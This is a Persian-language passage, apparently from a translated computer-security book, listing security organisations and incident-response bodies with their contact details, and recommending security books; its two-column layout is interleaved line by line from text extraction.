)ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻓﻮﻕ ﺑﻪ ﺻﻔﺤﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﺎ TC 11ﺑﺮﻭﻳﺪ(. ﻫﻤﺎﻳﺶ ﺳﺎﻻﻧﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﮔﺰﺍﺭ ﻣﻲﻛﻨﺪ.
٥٣٤
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ) SANSﻣﺆﺳﺴﻪ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ(
٥٣٧
) NISTﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ( ﻣﺆﺳﺴﻪﺍﻱ ﻛﻪ ﻛﺎﺭﮔﺎﻫﻬﺎ ﻭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎﻳﻲ ﺭﺍ ﺩﺭ ﻧﻘـﺎﻁ ﻣﺨﺘﻠـﻒ
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﺍﺭ ﻣﻲﻛﻨـﺪ ﺗـﺎ ﺩﺭ ﺍﺑﻌـﺎﺩ ﻣﺨﺘﻠـﻒ ﺍﻣﻨﻴـﺖ ﻭ
ﺍﻳﻦ ﻣﺆﺳﺴﻪ )ﻛﻪ ﺳﺎﺑﻘﹰﺎ ﺍﺩﺍﺭﻩ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ٥٣٨ﻧﺎﻡ ﺩﺍﺷﺖ( ،ﻣﺴﺌﻮﻟﻴﺖ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﺁﻣﻮﺯﺵ ﻣﺴﺘﻤﺮ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺑﺎﺷﺪ .ﺍﺯ ﺟﻤﻠـﺔ
ﺗــﺪﻭﻳﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺭﻭﺷــﻬﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺩﻭﺭﻩﻫــﺎﻱ ﺁﻣﻮﺯﺷــﻲ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﺁﻣﻮﺯﺷــﻬﺎﻳﻲ ﺩﺭ ﺧــﺼﻮﺹ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻣﻨﻔـﻚ ﺍﺯ ﻭﺯﺍﺭﺕ ﺩﻓـﺎﻉ ﺭﺍ ﺑﺮﻋﻬـﺪﻩ ﺩﺍﺭﺩ. ﻣﻬﺎﺟﻢﻳﺎﺏ ،ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻭ ﺍﻣﻨﻴـﺖ ﻋﻤـﻮﻣﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ .ﺍﻳـﻦ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻋﻼﻭﻩ ﺑـﺮ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﺷـﺎﻣﻞ ﺳﺎﺯﻣﺎﻥ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧﻮﺩ ﺧﺒﺮﻧﺎﻣﻪﻫـﺎ ،ﻫـﺸﺪﺍﺭﻫـﺎ ﻭ
ﺗﺤﻘﻴﻘﺎﺕ ﻧﻴﺰ ﻣﻲﺷﻮﺩ. ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺧﻮﺩﺁﻣﻮﺯ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ.
National Infrastructure Protection Center ﻧﻜﺎﺕ ﻣﻔﻴﺪﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻌﻤﻮﻝ ﺍﺭﺍﺋﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ
J.Edgar Hoover Building ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ.
935 Pennsylvania Avenue, NW
Washington, D.C.20535-0001
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎ
+1-202-323-3205
http://www.nipc.gov
ﻭﺯﺍﺭﺕ ﺩﺍﺩﮔﺴﺘﺮﻱ FBI ،ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺳـﺮﻱ ﺍﻳـﺎﻻﺕ
٥٤٦
) USSSﺧﺪﻣﺎﺕ ﺳﺮﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﻣﺘﺤﺪﻩ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺁﻣﺪﻩﺍﻧـﺪ ،ﻧﻘـﺾ ﻗـﻮﺍﻧﻴﻦ ﻣﻠـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺳـﺮﻗﺖ ،ﻭ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺭﺍ
Financial Crimes Division
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ .ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻣﺘﻌـﺪﺩ ﺍﺯ ﺟﻤﻠـﻪ
Electronic Crime Branch
U.S. Secret Service FIRSTﻧﻴﺰ ﺑﻪ ﺗﺤﻘﻴﻖ ﺻﺮﻑ ﺩﺭ ﺧـﺼﻮﺹ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ
Washington, DC 20223 ﻧﻤﻲ ﭘﺮﺩﺍﺯﻧﺪ ؛ ﺑﻠﻜﻪ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻛﻤـﻚ
+1-202-435-7700 ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻲﺷﺘﺎﺑﻨﺪ؛ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﻭ ﻳـﺎ
http://www.ustreas.gov/usss/financial_crimes.shtml
ﮔــﺴﺘﺮﺵ ﺍﻳــﻦ ﻭﻗــﺎﻳﻊ ﺑــﻪ ﺗﺤﻘﻴــﻖ ،ﺍﺭﺍﺋــﻪ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﻧﺠــﺎﻡ
) FIRSTﺍﺗﺎﻕ ﮔﻔﺘﮕـﻮﻱ ﺗﻴﻤﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ.
٥٤٧
ﺍﻣﻨﻴﺘﻲ(
ﻻ ﺩﺍﺭﺍﻱ ﺩﻓـﺎﺗﺮ
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ ﻣﻌﻤـﻮ ﹰ
ﺍﻳﻦ ﻣﺠﻤﻊ ﺩﺭ ﻣﺎﺭﺱ ۱۹۹۳ﺗﺄﺳـﻴﺲ ﺷـﺪ FIRST .ﺍﺋﺘﻼﻓـﻲ ﺣﻮﺯﻩ ﺍﻱ )ﻣﺤﻠﻲ( ﻣﻲ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻧﻬـﺎ ﺍﻃﻼﻋـﺎﺕ
ﺍﺳﺖ ﻛﻪ ﺗﻴﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ ﺍﺧﺘﺼﺎﺻﻲﺗﺮﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ؛ ﻫﺮﭼﻨﺪ ﺗﻤﺎﻡ ﺩﻓﺎﺗﺮ ﻣﺤﻠﻲ ﻣﺠﻬـﺰ
ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺩﺭ ﺑﻪ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺑﺎ ﺳـﻄﺢ ﺁﻣﻮﺯﺷـﻲ ﻫﻤـﺴﺎﻥ ﺑـﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺩﻓـﺎﺗﺮ
ﻛﻨــﺎﺭ ﻫــﻢ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳــﺖ .ﻣﺆﺳــﺴﻴﻦ FIRSTﺍﺯ ﺗﻴﻤﻬــﺎﻱ ﻣﺮﻛﺰﻱ ﻧﻴﺴﺘﻨﺪ.
ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﮔـﺮﺩ ﻫـﻢ ﺁﻣـﺪﻩﺍﻧـﺪ. ٥٤٣
) DOJﻭﺯﺍﺭﺕ ﺩﺍﺩﮔﺴﺘﺮﻱ(
ﺍﻫﺪﺍﻑ FIRSTﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
10th & Constitutioan Ave. NW
ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺖ • & Criminal Division, (Computer Crime
ﻣﻘﺎﺑﻠﻪ ،ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ؛ )Intellectual Property Section
John C.Keeney Building, Suite 600
ﺍﻳﺠﺎﺩ ﺍﺑـﺰﺍﺭﻱ ﺑـﺮﺍﻱ ﺁﮔـﺎﻩﺳـﺎﺯﻱ ﻭ ﺍﻋـﻼﻥ ﻫـﺸﺪﺍﺭ ﺑـﻪ • Washington, DC 20530
ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺧﺼﻮﺹ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻓﺰﺍﻳﻨﺪﻩ؛ +1-202-514-1026
http://www.cybercirne.gov
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﮔﺴﺘﺮﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﻋﻀﻮ ﺑـﺎ •
ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﭼﻮﻥ ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﻛﺎﺭﻫﺎﻱ ﻋﻤﻠﻲ؛ ﻭ ٥٤٤
) FBIﺍﺩﺍﺭﺓ ﺗﺠﺴﺲ ﻣﻠﻲ(
ﺗﺸﻮﻳﻖ ﻭ ﺗﺴﻬﻴﻞ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺕ ،ﺍﺑﺰﺍﺭﻫـﺎ ﻭ •
ﻓﻨﻮﻥ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ. ٥٤٥
ﻣﻠـﻲ )FBI ، (NIPC ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﻛﺰ ﺣﻔﺎﻇﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﻣﺮﻛــﺰ - Infraguardﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ﻫﻤﻜــﺎﺭﺍﻥ
FIRSTﻫﺮﺳﺎﻝ ﻳﻚ ﻛﺎﺭﮔﺎﻩ ﺩﺭ ﺧﺼﻮﺹ ﺑﺎ ﻭﺍﻛﻨﺶ ﺑﻪ ﻭﻗـﺎﻳﻊ
ﻣﻨﻄﻘﻪﺍﻱ ﻛﻪ FBIﻭ ﺍﻗﺘﺼﺎﺩ ﻣﺤﻠﻲ ﺭﺍ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺟـﺮﺍﺋﻢ
ﺑﺨﺶ ﺷﺸﻢ
ﻣﻴﺰﺑﺎﻧﻬﺎﻱﺍﻳﻨﺘﺮﻧﺘﻲ ،ﺑﺮﺩﺍﺷﺘﻪ ﮔﺎﻣﻬﺎﻱ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺳـﻄﺢ ﻣﺆﺳﺴﻪ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺗﺒﺪﻳﻞ ﺷـﺪ ﻭ ﻭﻇـﺎﻳﻒ ﺩﺑﻴﺮﺧﺎﻧـﻪﺍﻱ ﺁﻥ ﺍﺯ
ﺁﮔﺎﻫﻲ ﭘﻴﺮﺍﻣﻮﻥ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ NISTﺗﻔﻜﻴﻚ ﮔﺮﺩﻳﺪ.
ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﻣـﻲﺑﺎﺷـﺪ.
FIRST Secretariats
ﺑﺎﻳﮕﺎﻧﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻭﺏ ﺍﻳﻦ ﻣﺮﻛﺰ ) (http://www.cert.orgﺷﺎﻣﻞ First.Org, Inc.
ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻏﻨﻲ ﺍﺯ ﻫﺸﺪﺍﺭﻫﺎﻱ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﮔﺬﺷـﺘﻪ PMB 349
650 Castro Street, Suite 120
ﻭ ﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻲﺑﺎﺷﺪ. Mountain View, CA 94041
first-sec@first.org
CERT Coordination Center http://www.first.org/
Software Engineering Institute
Carnegi Mellon University FIRSTﻣﺘﺸﻜﻞ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺳﺖ .ﺑـﺮﺍﻱ ﻣـﺸﺎﻫﺪﺓ
Pittsburgh, PA 15213-3890 ﺟﺪﻳﺪﺗﺮﻳﻦ ﻓﻬﺮﺳﺖ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻋـﻀﻮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ
+1-412-268-7090
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻳـﻚ ﻣـﺸﻜﻞ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻳـﺪ ﻭ ﻳـﺎ
cert@cert.org
ﻧﻴﺎﺯﻣﻨﺪ ﻛﻤﻚ ﻫﺴﺘﻴﺪ ،ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛـﺪﺍﻣﻴﻚ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﻣﺮﺑﻮﻁ ﺑﻪ ﻋﻤﻠﻴﺎﺕ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﻣﻮﻓﻖ ﺑـﻪ
ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﺸﺪﻳﺪ ،ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳـﺪ ﺗـﺎ
ﺁﻧﻬﺎ ﻣﻨﺎﺳﺐﺗﺮﻳﻦ ﮔﺮﻭﻩ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﻛﻨﻨﺪ.
Wood, Patrick H., and Stephen G. Kochan. ﺳﻌﻲ ﻣﺎ ﺑﺮ ﺍﻳﻦ ﺑﻮﺩﻩ ﻛﻪ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺟﻊ ﺩﺭ ﺩﺳـﺘﺮﺱ
UNIX System Security, Carmel, IN: Hayden ﻭ ﺍﺭﺯﺷﻤﻨﺪﺗﺮ ﻣﺤﺪﻭﺩ ﻛﻨﻴﻢ ﺗﺎ ﻳﺎﻓﺘﻦ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺩﺷﻮﺍﺭ
Books, 1986.
ﻧﺒﺎﺷﺪ .ﻭﺟﻮﺩ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻣﺮﺍﺟﻊ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ،ﺑـﻴﺶ ﺍﺯ ﻫـﺮ
ﻣﺮﺍﺟﻊ ﺍﻣﻨﻴﺘﻲ Windows ﺩﻟﻴﻠﻲ ،ﺑﻪ ﺩﻟﻴﻞ ﺗﺎﺭﻳﺨﻲ ﺑﻮﺩﻥ ﺁﻧﻬﺎ ﺍﺳـﺖ .ﻫﻤﭽﻨـﻴﻦ ﺁﻧﺠـﺎ ﻛـﻪ
ﺑﻨﻈﺮ ﺭﺳﻴﺪﻩ ﺗﻮﺿﻴﺢ ﺍﺿﺎﻓﻪﺗﺮ ﺑﻪ ﺧﻮﺍﻧﻨﺪﻩ ﻛﻤﻚ ﻣﻲﻛﻨـﺪ ،ﺍﺯ ﺁﻥ
ﻳﻚ ﺭﺍﻫﻨﻤﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻳﻢ.
Windows NTﻛــﻪ ﺑــﺮﺍﻱ ﺍﺭﺍﺋــﻪ ﺧــﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﺑﻜــﺎﺭ
ﻣﻲﺭﻭﻧﺪ: ﭼﻨﺎﻧﭽﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻳﻚ ﻗﻔﺴﻪ ﻛﺘـﺎﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ،ﭘﻴﺸﻨﻬﺎﺩ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺑـﺮﺍﻱ
Norberg, Stefan. Securing Windows ﺧﺮﻳــﺪ ﻛﺘﺎﺑﻬــﺎﻳﻲ ﻛــﻪ ﻋﻨــﺎﻭﻳﻦ ﺁﻧﻬــﺎ ﺟــﺬﺍﺏ ﺍﺳــﺖ ،ﺍﺯ ﻳــﻚ
NT/2000 Servers for the Internet: A
Checklist for System Administrators. ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺗﺨﺼﺼﻲ ﺑﺎﺯﺩﻳﺪ ﺑﻌﻤﻞ ﺁﻭﺭﻳـﺪ ،ﺑـﺎ ﻳـﻚ ﻓﺮﻭﺷـﻨﺪﺓ
Cambridge, MA: O’Reilly and Associates, ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﻛﻨﻔﺮﺍﻧﺲ ﺍﻣﻨﻴﺘـﻲ ﻣﻼﻗـﺎﺕ ﻛﻨﻴـﺪ ﻭ ﻳـﺎ ﺧﻼﺻـﺔ
2002.
ﻛﺘﺎﺑﻬﺎ ﺭﺍ ﺩﺭ ﺍﺗﺎﻗﻬﺎﻱ ﻣﺠﺎﺯﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻄﺎﻟﻌـﻪ
Anderson-Redick, Stacey. Windows System ﻧﻤﺎﻳﻴﺪ .ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﭘﻴـﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣـﻞ ﺍﺳـﺖ.
Policy Editor. Sebastopol, CA: O’Reilly and
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻭﻗﺖ ﺧﻮﺩ ﺭﺍ ﺻﺮﻑ ﺍﺷﻜﺎﻻﺕ ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﻛﻨﻴﺪ،
Associates, 2000.
ﺑﺨﺶ ﺷﺸﻢ
ﺗﻤﺎﻡ ﻣﻮﺿﻮﻉ ﺷﻤﺎﺭﺓ ﺯﻳﺮ ﻧﺸﺮﻳﺔ ACMﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺳﺘﺎﻧﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺟﺮﻡ ﺑﺰﺭﮒ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺗﻤﺎﻡ ﺁﻥ ﺑﻮﺳﻴﻠﺔ
ﺭﺧﺪﺍﺩﻱ ﻛﻪ ﻳﻚ ﻛﺮﻡ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺴﺒﺐ ﺁﻥ ﺑﻮﺩ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺭﺩ: ﺩﻭ ﻧﻔﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ ﺑﻮﺩ .ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺑﺎﻋﺚ ﺷﺪ ﺟﻮﺧﺔ ﺟـﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ ،FBIﭼﻨﺪ ﺗﻴﻢ ،FIRSTﻭ ﻧﻴـﺰ ﺍﺑـﺰﺍﺭ Tripwireﺩﺭ
Communications of the ACM, Volume 32,
Number 6, June 1989 (the entire issue). ﺩﺍﻧﺸﮕﺎﻩ Purdueﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ:
ﻛﺘﺎﺏ ﺯﻳﺮ ﺩﺭﻭﺍﻗﻊ ﺑﻬﺘـﺮﻳﻦ ﻛﺘـﺎﺑﻲ ﺑـﻮﺩ ﻛـﻪ ﺟﻨﺒـﻪﻫـﺎﻱ ﻓﻨـﻲ Freedman, David H., and Charles C. Mann.
@Large; NYC, NY, 1997.
ﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺑﺨﻮﺑﻲ ﻧﻴـﺰ
ﺩﺭ ﺩﺳــﺘﺮﺱ ﻗــﺮﺍﺭ ﺩﺍﺷــﺖ ،ﺍﻣــﺎ ﺩﺭ ﺁﻥ ﺳــﺨﻨﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻳﻚ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﺸﻬﻮﺭ ﺍﺯ ﻳﻚ ﻛﺘﺎﺏ ﺁﻣﻮﺯﺷﻲ FBIﻛﻪ ﻫﺮﭼﻨﺪ
Macroﻫﺎ ﺑﻪ ﻣﻴﺎﻥ ﻧﻴﺎﻣﺪﻩ ﺍﺳﺖ: ﻗﺪﻳﻤﻲ ﺍﺳﺖ ﻭﻟﻲ ﻫﻨﻮﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺩﺭ ﺁﻥ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ:
Ferbrache, David. The Pathology of Icove, David, Karl Seger, and William
Computer Viruses. London, England: VonStorch, Computer Crime: A
Springer- Verlag, 1992. Crimefighter’s Handbook, Sebastopol, CA:
O’Reilly & Associates, 1995.
ﻣﺠﻤﻮﻋﺔ ﺟﺎﻣﻌﻲ ﺍﺯ ﻣﻄﺎﻟﺐ ﻣﺮﺑﻮﻁ ﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ ،ﻛﺮﻣﻬـﺎ ﻭ ﻧﻴـﺰ
ﭼﺎﭖ ﻣﺠﺪﺩ ﻣﻘﺎﻻﺕ ﺳﻨﺘﻲ ،ﻛﻪ ﺑﻴﺸﺘﺮ ﺑـﻪ ﺩﻻﻳـﻞ ﺗـﺎﺭﻳﺨﻲ ﺩﺭ ﻣﺠﻤﻮﻋﻪ ﺩﺍﺳـﺘﺎﻧﻬﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺗﺤﻘﻴﻘـﺎﺕ
ﺍﻳﻨﺠﺎ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ: ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬـﺎ ،ﻛـﻪ ﺩﺭ ﺁﻥ ﺑـﺮﺍﻱ ﺭﻭﺷـﻦ ﺷـﺪﻥ ﺍﺑﻌـﺎﺩ ﻣـﺴﺌﻪ،
ﺁﻣﺎﺭﻫﺎﻳﻲ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ:
Denning, Peter J. Computers Under Attack:
Intruders, Worms and Viruses. Reading, MA: Power, Richard. Tangled Web. Indianapolis,
ACM Press/Addison-Wesley, 1990. IN, Que, 2002.
ﻣﺠﻤﻮﻋﺔ ﺟـﺎﻣﻌﻲ ﺍﺯ ﻣﻄﺎﻟـﺐ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻭﻳﺮﻭﺳـﻬﺎ ،ﻛﺮﻣﻬـﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﻣﻮﺍﺭﺩﻱ ﺍﺯﺍﻳﻦ ﻗﺒﻴﻞ ،ﻛﻪ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺩﻻﻳـﻞ ﺗـﺎﺭﻳﺨﻲ ﺩﺭ ﺍﻳﻨﺠـﺎ
ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪﺓ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺳﻴﺴﺘﻤﻬﺎﻱ
ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ:
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ،ﻭ ﺭﻭﺷﻬﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑـﺎ
